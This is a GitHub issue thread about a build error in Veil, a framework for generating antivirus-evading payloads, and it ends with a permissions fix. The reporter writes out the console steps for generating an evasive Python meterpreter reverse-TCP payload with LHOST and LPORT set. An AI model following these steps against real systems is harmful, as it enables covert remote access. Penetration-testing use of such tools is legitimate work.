### ISSUE TITLE
[SOLVED] [!] ERROR: Unable to create output file.

### ISSUE THREAD

**Issue by xalopex** [Veil-Framework/Veil#296]
## Veil version
Veil | [Version]: 3.1.11Veil | [Version]: 3.1.11

## OS Used - all info (architecture, linux flavor, etc)
Ubuntu 16.04.6 LTS (Xenial Xerus)

## How did you install Veil? (Apt, Clone from Github, etc.)
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

## Did you run the setup script?
Yes.

## Pastebin link to error you are encountering (include console actions you took prior to error)
I run:
./Veil.py

I used:
use evasion
use python/meterpreter/rev_tcp.py
set LHOST 192.168.0.6
set LPORT 3000
generate
pythoninstaller
PyInstaller (1)

Then, I get this error:
[!] ERROR: Unable to create output file.

## Expected behavior
Executable Generated

## Any additional info you want to tell me

**Comment by xalopex** [comment]
![Screenshot from 2019-05-01 11-07-36](https://user-images.githubusercontent.com/10857482/57021718-6e230000-6c03-11e9-9a6d-f8fb7a580cc4.png)

**Comment by ChrisTruncer** [comment]
The version of Ubuntu that I support is 18.04 LTS. I did just pull down a clean image of Ubuntu and installed Veil on it, and it did not have any issues. I would suggest to try on a different VM, or try on 18.04

**Comment by xalopex** [comment]
Solution: sudo chown root:root -R /var/lib/veil/wine
